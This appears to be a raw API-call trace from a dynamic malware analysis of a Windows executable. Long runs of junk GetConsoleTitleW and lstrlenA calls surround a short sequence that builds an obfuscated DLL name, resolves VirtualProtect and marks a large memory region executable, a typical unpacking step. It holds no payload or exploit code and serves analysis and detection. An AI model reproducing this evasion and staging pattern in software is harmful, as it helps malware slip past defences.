GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.165] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.166] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.167] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.168] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.169] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.170] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.170] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.170] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.170] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.170] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.856] lstrcatA (in: lpString1="", lpString2="kirnel32.dll" | out: lpString1="kirnel32.dll") returned="kirnel32.dll" [0124.867] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0124.912] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0124.912] VirtualProtect (in: lpAddress=0x52ff9b8, dwSize=0x55ae7, flNewProtect=0x40, lpflOldProtect=0x18f60c | out: lpflOldProtect=0x18f60c*=0x4) returned 1 [0124.919] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.920] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.921] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.922] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.923] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.924] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.925] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] 